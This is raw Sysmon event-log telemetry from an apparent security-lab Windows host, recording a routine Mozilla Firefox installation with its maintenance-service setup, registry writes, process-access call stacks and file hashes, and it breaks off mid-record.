13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016309Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016308Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016307Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.255{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 13241300x800000000000000016302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\PathC:\Program Files\Mozilla Firefox 13241300x800000000000000016301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.255{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\(Default)C:\Program Files\Mozilla Firefox\firefox.exe 13241300x800000000000000016300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDB-PubSetValue2021-01-18 13:59:53.239{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\PublisherMozilla 11241100x800000000000000016299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:53.239{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exeC:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe2021-01-18 13:59:53.239 13241300x800000000000000016298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\DescriptionDer Mozilla Maintenance Service stellt sicher, dass die neueste und sicherste Version von Mozilla Firefox auf Ihrem Computer installiert ist. Denn Firefox auf dem aktuellen Stand zu halten, ist sehr wichtig für Ihre Sicherheit online und Mozilla empfiehlt mit Nachdruck, dass Sie den Dienst aktiviert lassen. 13241300x800000000000000016297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\Security\SecurityBinary Data 13241300x800000000000000016296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\ObjectNameLocalSystem 13241300x800000000000000016295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\DisplayNameMozilla Maintenance Service 13241300x800000000000000016294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\ImagePath"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" 13241300x800000000000000016293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\ErrorControlDWORD (0x00000001) 13241300x800000000000000016292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localT1031,T1050SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\StartDWORD (0x00000003) 13241300x800000000000000016291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:59:53.224{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\MozillaMaintenance\TypeDWORD (0x00000010) 10341000x800000000000000016290Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+57f3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+1eeb|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 154100x800000000000000016284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.196{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe84.0.2-FirefoxMozilla Foundationmaintenanceservice.exe"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" installC:\Program Files (x86)\Mozilla Maintenance Service\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=D80C4ABA0AFE02BFB75025087CEBB09B,SHA256=E1BD8385AA61F645C6390BD8A67D3EBB72A5B938FB50C66A7FBF2601D69BA2DF,IMPHASH=E4793B8A2E804520C3AE2CFD62D76D97{59A5CD1D-9459-6005-2E05-00000000A301}2680C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe"C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe" 10341000x800000000000000016283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.192{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9459-6005-2F05-00000000A301}6668C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+13a8 10341000x800000000000000016280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe+22d3 10341000x800000000000000016279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.177{59A5CD1D-9459-6005-2E05-00000000A301}26803768C:\Program Files\Mozilla 